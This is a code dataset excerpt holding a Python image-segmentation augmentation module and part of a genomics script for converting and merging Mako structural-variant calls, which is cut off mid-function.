int(self.size_w * w / h)\n oh = self.size_h\n return cv2.resize(img, (ow, oh)), cv2.resize(mask, (ow, oh), cv2.INTER_NEAREST)\n\n\nclass RandomSizedCrop(object):\n def __init__(self, size):\n self.size = size\n\n def __call__(self, img, mask):\n assert img.size == mask.size\n for attempt in range(10):\n area = img.size[0] * img.size[1]\n target_area = random.uniform(0.45, 1.0) * area\n aspect_ratio = random.uniform(0.5, 2)\n\n w = int(round(math.sqrt(target_area * aspect_ratio)))\n h = int(round(math.sqrt(target_area / aspect_ratio)))\n\n if random.random() < 0.5:\n w, h = h, w\n\n if w <= img.size[0] and h <= img.size[1]:\n x1 = random.randint(0, img.size[0] - w)\n y1 = random.randint(0, img.size[1] - h)\n\n img = img.crop((x1, y1, x1 + w, y1 + h))\n mask = mask.crop((x1, y1, x1 + w, y1 + h))\n assert img.size == (w, h)\n\n return (\n img.resize((self.size, self.size), Image.BILINEAR),\n mask.resize((self.size, self.size), Image.NEAREST),\n )\n\n # Fallback\n scale = Scale(self.size)\n crop = CenterCrop(self.size)\n return crop(*scale(img, mask))\n\n\nclass RandomSized(object):\n def __init__(self, size):\n self.size = size\n self.scale = Scale(self.size)\n self.crop = RandomCrop(self.size)\n\n def __call__(self, img, mask):\n assert img.size == mask.size\n\n w = int(random.uniform(0.5, 2) * img.size[0])\n h = int(random.uniform(0.5, 2) * img.size[1])\n\n img, mask = (img.resize((w, h), Image.BILINEAR), mask.resize((w, h), Image.NEAREST))\n\n return self.crop(*self.scale(img, mask))\n\n\nclass RandomGaussianBlur(object):\n def __init__(self, radius=5):\n self.radius = radius\n\n def __call__(self, image, label):\n if random.random() < 0.5:\n image = cv2.GaussianBlur(image, (self.radius, self.radius), 0)\n return image, label\n\n\n\nclass Sliding_Window_Crop(object):\n def __init__(self, size, stride):\n self.size = size\n self.stride = stride\n\n def __call__(self, img, mask):\n assert img.size == mask.size\n\n w, h = mask.size\n\n if w == self.size and h == self.size:\n return [Image.fromarray(img)], [Image.fromarray(mask)]\n if w < self.size or h < self.size:\n img = img.resize((max(w, self.size), max(h, self.size)), Image.BILINEAR)\n mask = mask.resize((max(w, self.size), max(h, self.size)), Image.NEAREST)\n\n # return [img.resize((self.size, self.size), Image.BILINEAR)], \\\n # [mask.resize((self.size, self.size), Image.NEAREST)]\n\n img = np.array(img)\n mask = np.array(mask)\n\n # Notice we swap to match PIL image with numpy array shape\n w, h = h, w\n\n step_w = int(np.ceil((w - self.size) / self.stride)) + 1\n step_h = int(np.ceil((h - self.size) / self.stride)) + 1\n\n img_list = []\n mask_list = []\n\n counter = 0\n for i in range(step_w):\n for j in range(step_h):\n start_x = i * self.stride\n start_y = j * self.stride\n end_x = start_x + self.size\n end_y = start_y + self.size\n if end_x >= w:\n end_x = w\n start_x = end_x - self.size\n if end_y >= h:\n end_y = h\n start_y = end_y - self.size\n\n img_crop = img[start_x:end_x, start_y:end_y, :]\n mask_crop = mask[start_x:end_x, start_y:end_y]\n\n img_list.append(Image.fromarray(img_crop))\n mask_list.append(Image.fromarray(mask_crop))\n\n # img_crop = img.crop((start_x, start_y, end_x, end_y))\n # mask_crop = mask.crop((start_x, start_y, end_x, end_y))\n # img_list.append(img_crop)\n # mask_list.append(mask_crop)\n\n # temp_dir = '/home/xujl/data/results/frrn_debug/'\n # img_temp =Image.fromarray(img_crop)\n # img_temp.save(temp_dir + str(counter) + '.png')\n # counter = counter + 1\n\n\n # print(start_x, end_x, start_y, end_y, img_crop.size)\n return img_list, mask_list\n\n\nclass SW_Merge_Prediction(object):\n def __init__(self, size, stride, original_w, original_h):\n self.size = size\n self.stride = stride\n self.original_w = original_w\n self.original_h = original_h\n\n def __call__(self, mask_list):\n pred = np.array(np.zeros([self.original_w, self.original_h])).astype(np.float64)\n counter = pred + (1 + np.finfo(np.float32).eps)\n\n total = len(mask_list)\n step_w = int(np.ceil((self.original_w - self.size) / self.stride))\n step_h = int(np.ceil((self.original_h - self.size) / self.stride))\n\n idx = 0\n for i in range(step_w):\n for j in range(step_h):\n start_x = i * self.stride\n start_y = j * self.stride\n end_x = start_x + self.size\n end_y = start_y + self.size\n\n if i == step_w - 1:\n end_x = self.original_w\n start_x = end_x - self.size\n\n if j == step_h - 1:\n end_y = self.original_h\n start_y = end_y - self.size\n\n pred[start_x:end_x, start_y:end_y] += mask_list[idx]\n counter[start_x:end_x, start_y:end_y] += 1\n idx += 1\n\n pred /= counter\n pred = pred[np.newaxis, :, :]\n return pred\n\n\nclass SWA_Merge_Prediction(object):\n def __init__(self, size, stride, original_w, original_h):\n self.size = size\n self.stride = stride\n self.original_w = original_w\n self.original_h = original_h\n self.weight, self.ori_weight = self.get_weight()\n self.gauss = self.get_gauss(window_size=size, sigma=1.5)\n\n def get_gauss(self, window_size, sigma=1.5):\n one_gauss = np.array(\n [np.exp(-(x - window_size // 2) ** 2 / float(2 * sigma ** 2)) for x in range(window_size)])\n one_gauss /= np.sum(one_gauss)\n\n two_gauss = np.matmul(one_gauss, one_gauss.T)\n return two_gauss\n\n def get_weight(self):\n weight = np.zeros([self.size, self.size])\n for i in range(self.size):\n for j in range(self.size):\n dx = min(i, self.size - i)\n dy = min(j, self.size - j)\n d = min(dx, dy)\n weight[i, j] = d + 1\n\n weight /= weight.max()\n\n ori_weight = np.zeros([self.original_w, self.original_h])\n for i in range(self.original_w):\n for j in range(self.original_h):\n dx = min(i, self.original_w - i)\n dy = min(j, self.original_h - j)\n d = min(dx, dy)\n ori_weight[i, j] = d + 1\n\n ori_weight /= ori_weight.max()\n\n return weight, ori_weight\n\n def __call__(self, mask_list):\n ow = max(self.original_w, self.size)\n oh = max(self.original_h, self.size)\n\n pred = np.array(np.zeros([ow, oh])).astype(np.float64)\n counter = pred + 1\n\n total = len(mask_list)\n step_w = int(np.ceil((ow - self.size) / self.stride)) + 1\n step_h = int(np.ceil((oh - self.size) / self.stride)) + 1\n\n # print('step_w, ', step_w, 'step_h ', step_h, 'total: ', total)\n # print('self.size ', self.size, 'self.stride, ', self.stride, 'ow, ', self.original_w, 'oh', self.original_h)\n idx = 0\n\n for i in range(step_w):\n for j in range(step_h):\n start_x = i * self.stride\n start_y = j * self.stride\n end_x = start_x + self.size\n end_y = start_y + self.size\n\n if end_x >= ow:\n end_x = ow\n start_x = end_x - self.size\n\n if end_y >= oh:\n end_y = oh\n start_y = end_y - self.size\n\n\n # pred[start_x:end_x, start_y:end_y] += mask_list[idx] * self.gauss\n # counter[start_x:end_x, start_y:end_y] += self.gauss\n pred[start_x:end_x, start_y:end_y] += mask_list[idx]\n counter[start_x:end_x, start_y:end_y] += 1\n idx += 1\n\n pred /= counter\n # pred /= self.ori_weight\n pred = pred[0:self.original_w, 0:self.original_h]\n pred = pred[np.newaxis, :, :]\n return pred\n\n\nclass elastic_transform(object):\n def __init__(self):\n pass\n\n def __call__(self, img, mask):\n img = np.array(img)\n mask = np.array(mask)\n\n image = np.concatenate((img, mask[:, :, np.newaxis]), axis=2)\n\n alpha = img.shape[0] * 2\n sigma = img.shape[0] * 0.08\n alpha_affine = img.shape[0] * 0.08\n random_state = None\n\n if random_state is None:\n random_state = np.random.RandomState(None)\n\n shape = image.shape\n shape_size = shape[:2]\n\n # Random affine\n center_square = np.float32(shape_size) // 2\n square_size = min(shape_size) // 3\n pts1 = np.float32(\n [center_square + square_size, [center_square[0] + square_size, center_square[1] - square_size],\n center_square - square_size])\n pts2 = pts1 + random_state.uniform(-alpha_affine, alpha_affine, size=pts1.shape).astype(np.float32)\n M = cv2.getAffineTransform(pts1, pts2)\n\n image = cv2.warpAffine(image, M, shape_size, borderMode=cv2.BORDER_REFLECT_101)\n\n dx = gaussian_filter((random_state.rand(*shape) * 2 - 1), sigma) * alpha\n dy = gaussian_filter((random_state.rand(*shape) * 2 - 1), sigma) * alpha\n dz = np.zeros_like(dx)\n\n x, y, z = np.meshgrid(np.arange(shape[1]), np.arange(shape[0]), np.arange(shape[2]))\n indices = np.reshape(y + dy, (-1, 1)), np.reshape(x + dx, (-1, 1)), np.reshape(z, (-1, 1))\n\n image = map_coordinates(image, indices, order=1, mode='reflect').reshape(shape)\n\n img = image[:, :, :3]\n mask = image[:, :, 3]\n return img, mask\n\n\nclass RandomResizedCrop(object):\n def __init__(self, size, scale=(0.05, 1.5), ratio=(3. / 4., 4. / 3.), interpolation=Image.BILINEAR):\n self.size = (size, size)\n self.interpolation = interpolation\n self.scale = scale\n self.ratio = ratio\n\n\n @staticmethod\n def get_params(img, scale, ratio):\n for attempt in range(10):\n area = img.size[0] * img.size[1]\n target_area = random.uniform(*scale) * area\n aspect_ratio = random.uniform(*ratio)\n w = int(round(math.sqrt(target_area * aspect_ratio)))\n h = int(round(math.sqrt(target_area / aspect_ratio)))\n if random.random() < 0.5:\n w, h = h, w\n if w <= img.size[0] and h <= img.size[1]:\n i = random.randint(0, img.size[1] - h)\n j = random.randint(0, img.size[0] - w)\n\n w = min(img.size[0], img.size[1])\n i = (img.size[1] - w) // 2\n j = (img.size[0] - w) // 2\n return i, j, h, w\n\n def __call__(self, img, mask):\n i, j, h, w = self.get_params(img, self.scale, self.ratio)\n return tf.resized_crop(img, i, j, h, w, self.size, self.interpolation),\\\n tf.resized_crop(mask, i, j, h, w, self.size, self.interpolation),\\\n\n\nclass RandScale(object):\n # Randomly resize image & label with scale factor in [scale_min, scale_max]\n def __init__(self, scale, aspect_ratio=None):\n assert (isinstance(scale, collections.Iterable) and len(scale) == 2)\n if isinstance(scale, collections.Iterable) and len(scale) == 2 \\\n and isinstance(scale[0], numbers.Number) and isinstance(scale[1], numbers.Number) \\\n and 0 < scale[0] < scale[1]:\n self.scale = scale\n else:\n raise (RuntimeError(\"segtransform.RandScale() scale param error.\\n\"))\n if aspect_ratio is None:\n self.aspect_ratio = aspect_ratio\n elif isinstance(aspect_ratio, collections.Iterable) and len(aspect_ratio) == 2 \\\n and isinstance(aspect_ratio[0], numbers.Number) and isinstance(aspect_ratio[1], numbers.Number) \\\n and 0 < aspect_ratio[0] < aspect_ratio[1]:\n self.aspect_ratio = aspect_ratio\n else:\n raise (RuntimeError(\"segtransform.RandScale() aspect_ratio param error.\\n\"))\n\n def __call__(self, image, mask):\n temp_scale = self.scale[0] + (self.scale[1] - self.scale[0]) * random.random()\n temp_aspect_ratio = 1.0\n if self.aspect_ratio is not None:\n temp_aspect_ratio = self.aspect_ratio[0] + (self.aspect_ratio[1] - self.aspect_ratio[0]) * random.random()\n temp_aspect_ratio = math.sqrt(temp_aspect_ratio)\n scale_factor_x = temp_scale * temp_aspect_ratio\n scale_factor_y = temp_scale / temp_aspect_ratio\n image = cv2.resize(image, None, fx=scale_factor_x, fy=scale_factor_y, interpolation=cv2.INTER_LINEAR)\n mask = cv2.resize(mask, None, fx=scale_factor_x, fy=scale_factor_y, interpolation=cv2.INTER_NEAREST)\n return image, mask\n\n\nclass Crop(object):\n \"\"\"Crops the given ndarray image (H*W*C or H*W).\n Args:\n size (sequence or int): Desired output size of the crop. If size is an\n int instead of sequence like (h, w), a square crop (size, size) is made.\n \"\"\"\n def __init__(self, size, crop_type='rand', padding=None, ignore_label=255):\n if isinstance(size, int):\n self.crop_h = size\n self.crop_w = size\n elif isinstance(size, collections.Iterable) and len(size) == 2 \\\n and isinstance(size[0], int) and isinstance(size[1], int) \\\n and size[0] > 0 and size[1] > 0:\n self.crop_h = size[0]\n self.crop_w = size[1]\n else:\n raise (RuntimeError(\"crop size error.\\n\"))\n if crop_type == 'center' or crop_type == 'rand':\n self.crop_type = crop_type\n else:\n raise (RuntimeError(\"crop type error: rand | center\\n\"))\n if padding is None:\n self.padding = padding\n elif isinstance(padding, list):\n if all(isinstance(i, numbers.Number) for i in padding):\n self.padding = padding\n else:\n raise (RuntimeError(\"padding in Crop() should be a number list\\n\"))\n if len(padding) != 3:\n raise (RuntimeError(\"padding channel is not equal with 3\\n\"))\n else:\n raise (RuntimeError(\"padding in Crop() should be a number list\\n\"))\n if isinstance(ignore_label, int):\n self.ignore_label = ignore_label\n else:\n raise (RuntimeError(\"ignore_label should be an integer number\\n\"))\n\n def __call__(self, image, label):\n #print(label.shape)\n h, w = label.shape[:2]\n pad_h = max(self.crop_h - h, 0)\n pad_w = max(self.crop_w - w, 0)\n pad_h_half = int(pad_h / 2)\n pad_w_half = int(pad_w / 2)\n if pad_h > 0 or pad_w > 0:\n if self.padding is None:\n raise (RuntimeError(\"segtransform.Crop() need padding while padding argument is None\\n\"))\n image = cv2.copyMakeBorder(image, pad_h_half, pad_h - pad_h_half, pad_w_half, pad_w - pad_w_half, cv2.BORDER_CONSTANT, value=self.padding)\n label = cv2.copyMakeBorder(label, pad_h_half, pad_h - pad_h_half, pad_w_half, pad_w - pad_w_half, cv2.BORDER_CONSTANT, value=self.ignore_label)\n h, w = label.shape[:2]\n if self.crop_type == 'rand':\n h_off = random.randint(0, h - self.crop_h)\n w_off = random.randint(0, w - self.crop_w)\n else:\n h_off = int((h - self.crop_h) / 2)\n w_off = int((w - self.crop_w) / 2)\n image = image[h_off:h_off+self.crop_h, w_off:w_off+self.crop_w]\n label = label[h_off:h_off+self.crop_h, w_off:w_off+self.crop_w]\n return image, label\n\n\nclass Lambda(object):\n \"\"\"Apply a user-defined lambda as a transform.\n\n Args:\n lambd (function): Lambda/function to be used for transform.\n \"\"\"\n\n def __init__(self, lambd):\n # assert isinstance(lambd, types.LambdaType)\n self.lambd = lambd\n\n def __call__(self, img, mask):\n return self.lambd(img), self.lambd(mask)\n\n def __repr__(self):\n return self.__class__.__name__ + '()'\n\n\nclass ColorJitter(object):\n \"\"\"Randomly change the brightness, contrast and saturation of an image.\n\n Args:\n brightness (float): How much to jitter brightness. brightness_factor\n is chosen uniformly from [max(0, 1 - brightness), 1 + brightness].\n contrast (float): How much to jitter contrast. contrast_factor\n is chosen uniformly from [max(0, 1 - contrast), 1 + contrast].\n saturation (float): How much to jitter saturation. saturation_factor\n is chosen uniformly from [max(0, 1 - saturation), 1 + saturation].\n hue(float): How much to jitter hue. hue_factor is chosen uniformly from\n [-hue, hue]. Should be >=0 and <= 0.5.\n \"\"\"\n def __init__(self, brightness=0, contrast=0, saturation=0, hue=0):\n self.brightness = brightness\n self.contrast = contrast\n self.saturation = saturation\n self.hue = hue\n\n @staticmethod\n def get_params(brightness, contrast, saturation, hue):\n \"\"\"Get a randomized transform to be applied on image.\n\n Arguments are same as that of __init__.\n\n Returns:\n Transform which randomly adjusts brightness, contrast and\n saturation in a random order.\n \"\"\"\n transforms = []\n if brightness > 0:\n brightness_factor = random.uniform(max(0, 1 - brightness), 1 + brightness)\n transforms.append(Lambda(lambda img: tf.adjust_brightness(img, brightness_factor)))\n\n if contrast > 0:\n contrast_factor = random.uniform(max(0, 1 - contrast), 1 + contrast)\n transforms.append(Lambda(lambda img: tf.adjust_contrast(img, contrast_factor)))\n\n if saturation > 0:\n saturation_factor = random.uniform(max(0, 1 - saturation), 1 + saturation)\n transforms.append(Lambda(lambda img: tf.adjust_saturation(img, saturation_factor)))\n\n if hue > 0:\n hue_factor = random.uniform(-hue, hue)\n transforms.append(Lambda(lambda img: tf.adjust_hue(img, hue_factor)))\n\n random.shuffle(transforms)\n transform = Compose(transforms)\n\n return transform\n\n def __call__(self, img, mask):\n \"\"\"\n Args:\n img (PIL Image): Input image.\n\n Returns:\n PIL Image: Color jittered image.\n \"\"\"\n transform = self.get_params(self.brightness, self.contrast,\n self.saturation, self.hue)\n return transform(img, mask)\n\n def __repr__(self):\n format_string = self.__class__.__name__ + '('\n format_string += 'brightness={0}'.format(self.brightness)\n format_string += ', contrast={0}'.format(self.contrast)\n format_string += ', saturation={0}'.format(self.saturation)\n format_string += ', hue={0})'.format(self.hue)\n return format_string\n\n'''\nif __name__ == '__main__':\n\n elastic = elastic_transform()\n img = Image.open('/home/xujl/data/gland/train/train_1.bmp')\n mask = Image.open('/home/xujl/data/gland/train_masks/train_anno_1.bmp')\n contour = Image.open('/home/xujl/data/gland/train_contour/train_anno_1.bmp')\n\n img2, mask2, contour2 = elastic(img, mask, contour)\n # img2 = elastic(img, mask, contour)\n\n plt.imshow(img)\n plt.show()\n\n plt.imshow(img2)\n plt.show()\n\n\n plt.imshow(np.array(mask))\n plt.show()\n\n\n plt.imshow(np.array(mask2))\n plt.show()\n\n plt.imshow(np.array(contour))\n plt.show()\n\n plt.imshow(np.array(contour2))\n plt.show()\n'''\n\n","repo_name":"klad2008/Google_ML_Winter_Camp_2020","sub_path":"segmentation-xujilan/transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":28229,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"3403510525","text":"#!/usr/bin/env python\n\n# encoding: utf-8\n\n'''\n\n@author: Jiadong Lin, Xi'an Jiaotong Univeristy, Leiden University\n\n@contact: jiadong324@gmail.com\n\n@time: 2019/11/4\n'''\n\n\nimport sys\n\nfrom optparse import OptionParser\nimport pysam\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pylab as plt\nimport re\n\nparser = OptionParser()\nCHROMS = [\"chr1\", \"chr2\", \"chr3\", \"chr4\", \"chr5\", \"chr6\", \"chr7\", \"chr8\", \"chr9\", \"chr10\", \"chr11\", \"chr12\", \"chr13\", \"chr14\", \"chr15\", \"chr16\",\n \"chr17\", \"chr18\", \"chr19\", \"chr20\", \"chr21\", \"chr22\", \"chrX\"]\n\nclass Interval:\n def __init__(self, chrom, start, end, pattern, sample, interval_str):\n self.chrom = chrom\n self.start = start\n self.end = end\n self.pattern = pattern\n self.sample = sample\n self.interval = interval_str\n\n def overlap(self, interval, max_dist, len_prop):\n this_size = self.end - self.start\n inter_size = interval.end - interval.start\n\n min_len = this_size * len_prop\n max_len = this_size * (2 - len_prop)\n\n # Two intervals overlap\n if min(self.end, interval.end) >= max(self.start, interval.start) and self.chrom == interval.chrom:\n # Check breakpoint distance\n if abs(self.start - interval.start) <= max_dist and abs(self.end - interval.end) <= max_dist:\n # Check if SV size matches\n if inter_size >= min_len and inter_size <= max_len:\n return True\n\n return False\n\n def toString(self):\n\n out_str = \"{0}\\t{1}\\t{2}\\t\".format(self.chrom, self.start, self.end)\n interval_tokens = self.interval.split(\";\")\n sample_tokens = self.sample.split(\";\")\n\n sample_str = \"\"\n for i in range(len(sample_tokens)):\n sample_str += \"{0},{1};\".format(sample_tokens[i], interval_tokens[i])\n\n out_str += sample_str[:-1] + \"\\t\" + self.pattern\n\n return out_str\n\n\ndef mako_to_vcf(mako, out):\n '''\n Convert Mako raw output to standard VCF format\n :param mako:\n :param out:\n :param ref:\n :param sample:\n :return:\n '''\n\n print(\"Convert to VCF ...\")\n\n names = (\"chr\", \"start\", \"end\", \"type\", \"filter\", \"info\", \"pattern\", \"weight\")\n\n call_list = list()\n\n calls = pd.read_csv(mako, header=None, sep=\"\\t\", names=names)\n\n for idx, row in calls.iterrows():\n info_tokens = row[\"info\"].split(\";\")\n qual = info_tokens[0].split(\"=\")[1]\n brkp_str = \"\"\n supp_str = \"\"\n CR = 0\n for i in range(1, len(info_tokens)):\n info = info_tokens[i]\n if \"cr\" in info:\n CR = info.split(\"=\")[1]\n else:\n brkp_str += \"BRK{0}={1},{2};\".format(i, info.split(\",\")[0], info.split(\",\")[1])\n supp_str += \"SA{0}={1},RP{2}={3};\".format(i, info.split(\",\")[2].split(\"=\")[1], i, info.split(\",\")[3].split(\"=\")[1])\n\n supp_str += \"CR={0}\".format(CR)\n\n alt = \"\"\n if \",\" in row[\"type\"]:\n alt = \"\"\n svlen = int(row[\"end\"]) - int(row[\"start\"])\n\n vcf_info_str = \"END={0};SVLEN={1};SVTYPE={2};{3};{4};PATTERN={5};WEIGHT={6}\".format(row[\"end\"], svlen, row['type'], brkp_str[:-1], supp_str, row['pattern'], row['weight'])\n\n this_call = (row[\"chr\"], row[\"start\"], \"N\", alt, qual, row[\"filter\"], vcf_info_str)\n\n call_list.append(this_call)\n\n df_calls = pd.DataFrame(call_list, columns=[\"#CHROM\", \"POS\", \"REF\", \"ALT\", \"QUAL\", \"FILTER\", \"INFO\"])\n\n sorted_df_calls = df_calls.sort_values(['#CHROM', 'POS'], ascending=[True, True])\n\n with open(out, \"w\") as vcf:\n vcf.write(\"##fileformat=VCFv4.2\\n\")\n vcf.write(\"##source=Mako V1.0\\n\")\n vcf.write(\n '##REF=' + \"\\n\")\n vcf.write(\n '##ALT=, Description=\"Simple SV inferred from subgraph\">' + \"\\n\")\n vcf.write(\n '##ALT=, Description=\"Complex SV inferred from subgraph\">' + \"\\n\")\n vcf.write(\n '##QUAL=' + \"\\n\")\n vcf.write(\n '##FILTER=' + \"\\n\")\n vcf.write('##FILTER=' + \"\\n\")\n vcf.write('##FILTER=' + \"\\n\")\n vcf.write(\n '##FILTER=' + \"\\n\")\n vcf.write(\n '##INFO=' + \"\\n\")\n vcf.write(\n '##INFO=' + \"\\n\")\n vcf.write(\n '##INFO=' + \"\\n\")\n vcf.write(\n '##INFO=' + \"\\n\")\n vcf.write(\n '##INFO=' + \"\\n\")\n vcf.write(\n '##INFO=' + \"\\n\")\n\n sorted_df_calls.to_csv(vcf, sep=\"\\t\", index=False)\n\n\ndef merge_multiple_makos(sample_files, mako_dir, out_file, max_dist, len_prop):\n '''\n Merge multiple Mako call set\n :param sample_files:\n :param mako_dir:\n :param out_file:\n :param max_dist:\n :param len_prop:\n :return:\n '''\n\n intervals = []\n for line in open(sample_files, \"r\"):\n file_name = line.strip()\n mako_file_path = mako_dir + file_name\n sample_name = file_name.split(\".\")[0]\n\n cur_sample_sv_num = 0\n\n for line in open(mako_file_path, \"r\"):\n tmp = line.strip().split(\"\\t\")\n chrom = tmp[0]\n start = int(tmp[1])\n end = int(tmp[2])\n\n cur_sample_sv_num += 1\n sv_info_tokens = tmp[4].split(';')\n pattern_str = \"\"\n for token in sv_info_tokens:\n if token.split('=')[0] == 'Pattern':\n pattern_str = token.split('=')[1]\n break\n\n interval_str = \"{0},{1},{2}\".format(chrom, start, end)\n\n cur_interval = Interval(chrom, start, end, pattern_str, sample_name, interval_str)\n\n intervals = add_interval(intervals, cur_interval, max_dist, len_prop)\n\n # print sample_name + \", \" + str(cur_sample_sv_num) + \" SVs processed ..\"\n print(\"Merge sample: {0} total entries: {1}\".format(sample_name, len(intervals)))\n\n writer = open(out_file, \"w\")\n\n for interval in intervals:\n writer.write(interval.toString() + \"\\n\")\n writer.close()\n\n\ndef add_interval(intervals, new_interval, max_dist, len_prop):\n new_intervals = []\n\n num = len(intervals)\n\n if num == 0:\n new_intervals.append(new_interval)\n return new_intervals\n\n if new_interval.end < intervals[0].start or new_interval.start > intervals[num - 1].end:\n\n if new_interval.end < intervals[0].start:\n new_intervals.append(new_interval)\n\n new_intervals.extend(intervals)\n\n if new_interval.start > intervals[num - 1].end:\n new_intervals.append(new_interval)\n\n return new_intervals\n\n for i in range(len(intervals)):\n ele = intervals[i]\n overlap = ele.overlap(new_interval, max_dist, len_prop)\n # Overlapped\n if not overlap:\n new_intervals.append(ele)\n\n # check if given interval lies between two intervals\n if i < num and new_interval.start > intervals[i].end and new_interval.end < intervals[i + 1].start:\n new_intervals.append(new_interval)\n\n continue\n\n new_start = min(ele.start, new_interval.start)\n new_pattern = ele.pattern\n new_end = max(ele.end, new_interval.end)\n new_sample = ele.sample\n new_interval_str = ele.interval\n\n while i < num and overlap:\n new_end = max(intervals[i].end, new_interval.end)\n new_pattern += \";\" + new_interval.pattern\n new_sample += \";\" + new_interval.sample\n new_interval_str += \";\" + new_interval.interval\n if i == num - 1:\n overlap = False\n else:\n overlap = intervals[i + 1].overlap(new_interval, max_dist, len_prop)\n\n i += 1\n\n i -= 1\n\n new_intervals.append(\n Interval(new_interval.chrom, new_start, new_end, new_pattern, new_sample, new_interval_str))\n\n return new_intervals\n\n\ndef mako_filter(in_file, out_file, cxs, format):\n '''\n Filter mako raw call site with different evidence\n :param in_file:\n :param out_file:\n :return:\n '''\n writer = open(out_file, 'w')\n csvs_num = 0\n all_calls = 0\n for line in open(in_file, 'r'):\n if \"#\" in line:\n continue\n all_calls += 1\n tmp = line.strip().split(\"\\t\")\n cx_score = int(tmp[5].split(\";\")[0].split(\"=\")[1])\n # if cx_score not in scores:\n # scores.append(cx_score)\n if cx_score > cxs:\n csvs_num += 1\n if format == \"mako\":\n writer.write(line)\n elif format == \"bed\":\n sv_len = int(tmp[2]) - int(tmp[1])\n out_str = \"{0}\\t{1}\\t{2}\\t{3}\\n\".format(tmp[0], tmp[1], tmp[2], sv_len)\n writer.write(out_str)\n print(\"Number of calls after filtering: \", csvs_num)\n writer.close()\n # print(np.percentile(scores, 25))\n\ndef not_primary(aln):\n return aln.is_supplementary or aln.is_secondary\n\ndef classify_rps(bam, fai_file, min_mapq, min_insert, max_insert):\n seen_aln = {}\n npairs = 0\n genome_length = 0\n rp_type_dict = {}\n\n with open(fai_file, 'r') as f:\n for line in f:\n entries = line.strip().split(\"\\t\")\n chrom = entries[0]\n if \"chr\" not in chrom:\n chrom = \"chr{0}\".format(chrom)\n\n if chrom in CHROMS:\n genome_length += int(entries[1])\n print(\"Genome length: \", genome_length)\n\n for aln in bam.fetch(until_eof=True):\n if not_primary(aln) or aln.is_duplicate or aln.is_unmapped or aln.mate_is_unmapped:\n continue\n chrom = aln.reference_name\n if \"chr\" not in chrom:\n chrom = \"chr{0}\".format(chrom)\n\n if chrom not in CHROMS:\n continue\n\n if aln.qname not in seen_aln:\n seen_aln[aln.qname] = aln\n continue\n mate = seen_aln[aln.qname]\n npairs += 1\n del seen_aln[aln.qname]\n\n if npairs % 1000000 == 0:\n print(\"[bam summary] processed read-pairs: \", npairs)\n if aln.mapq < min_mapq or mate.mapq < min_mapq or aln.is_unmapped or \\\n mate.is_unmapped or not_primary(aln) or not_primary(mate):\n continue\n\n ilen = abs(aln.reference_start - mate.reference_end)\n sig_type = \"\"\n if aln.is_reverse != mate.is_reverse:\n second = aln if aln.is_reverse else mate\n first = aln if second is mate else mate\n if ilen > max_insert:\n sig_type = 'ARP_LARGE'\n\n elif (first.reference_start > second.reference_start) or \\\n (first.reference_end > second.reference_end):\n sig_type = 'ARP_RF'\n\n elif ilen < min_insert:\n sig_type = 'ARP_SMALL'\n else:\n sig_type = 'ARP_RR' if aln.is_reverse else \"ARP_FF\"\n\n if sig_type == \"\":\n continue\n\n if sig_type in rp_type_dict:\n rp_type_dict[sig_type] += 1\n else:\n rp_type_dict[sig_type] = 1\n\n return rp_type_dict, genome_length\n\n\ndef mako_config(bam, fai_file, num_to_check, min_mapq, out, sample):\n\n required = 97\n restricted = 3484\n flag_mask = required | restricted\n\n read_length = 0\n read_counter = 0\n\n L = []\n\n bam_file = pysam.AlignmentFile(bam, \"r\")\n\n for read in bam_file.fetch():\n if read_counter >= num_to_check:\n break\n\n cigar = read.cigarstring\n if cigar == None:\n continue\n\n read_length = get_read_length(cigar)\n flag = read.flag\n refname = read.reference_name\n mate_refname = read.next_reference_name\n isize = read.template_length\n\n valid = mate_refname == refname and flag & flag_mask == required and isize >= 0\n\n if valid:\n read_counter += 1\n L.append(isize)\n\n L = np.array(L)\n L.sort()\n med, umad = unscaled_upper_mad(L)\n upper_cutoff = med + 30 * umad\n L = L[L < upper_cutoff]\n\n mean = int(np.mean(L))\n stdev = int(np.std(L))\n\n min_insert = mean - 3 * stdev\n max_insert = mean + 3 * stdev\n\n print(\"mean: {0}\\tstd: {1}\\nStart to classify disocrdant read-pairs\".format(mean, stdev))\n\n rp_lambda, genome_length = classify_rps(bam_file, fai_file, min_mapq, min_insert, max_insert)\n\n out_str = \"mean:{0}\\nstdev:{1}\\nreadlen:{2}\\nworkDir:{3}\\nbam:{4}\\nname:{5}\\n\".format(mean, stdev, read_length, out, out + bam, sample)\n for rp_type, val in rp_lambda.items():\n out_str += \"{0}:{1}\\n\".format(rp_type, val / genome_length)\n\n print(\"All discordant read pairs processed!\")\n\n writer = open(out + sample + '.mako.cfg', 'w')\n writer.write(out_str)\n writer.close()\n\n\ndef unscaled_upper_mad(xs):\n \"\"\"Return a tuple consisting of the median of xs followed by the\n unscaled median absolute deviation of the values in xs that lie\n above the median.\n \"\"\"\n med = np.median(xs)\n return med, np.median(xs[xs > med] - med)\n\n\ndef get_read_length(cigar):\n cigarPattern = '([0-9]+[MIDNSHP])'\n cigarSearch = re.compile(cigarPattern)\n atomicCigarPattern = '([0-9]+)([MIDNSHP])'\n atomicCigarSearch = re.compile(atomicCigarPattern)\n\n readLen = 0\n if (cigar != '*'):\n cigarOpStrings = cigarSearch.findall(cigar)\n\n for opString in cigarOpStrings:\n cigarOpList = atomicCigarSearch.findall(opString)[0]\n readLen += int(cigarOpList[0])\n\n return readLen\n\ndef get_mako_sub(mako, out):\n\n ind_svs = []\n\n for line in open(mako, \"r\"):\n if \"#\" in line:\n continue\n\n tmp = line.strip().split(\"\\t\")\n chrom = tmp[0]\n\n sv_info = tmp[4]\n if \";;\" in sv_info:\n sv_info_tokens = sv_info.split(\";;\")\n for info_token in sv_info_tokens:\n tmp_token = info_token.split(\",\")\n if len(tmp_token) == 2 and \"-\" in tmp_token[0]:\n this_start = tmp_token[0].split(\"-\")[0]\n this_end = tmp_token[0].split(\"-\")[1]\n this_sv = (chrom, this_start, this_end, tmp_token[1])\n ind_svs.append(this_sv)\n else:\n for i in range(2, len(tmp_token)):\n token = tmp_token[i]\n if \"-\" in token:\n this_start = token.split(\"-\")[0]\n this_end = token.split(\"-\")[1]\n this_sv = (chrom, this_start, this_end, tmp_token[0] + \",\" + tmp_token[1] + \",\" + tmp_token[i + 1])\n ind_svs.append(this_sv)\n else:\n sv_info_tokens = sv_info.split(\",\")\n for i in range(2, len(sv_info_tokens)):\n token = sv_info_tokens[i]\n if \"-\" in 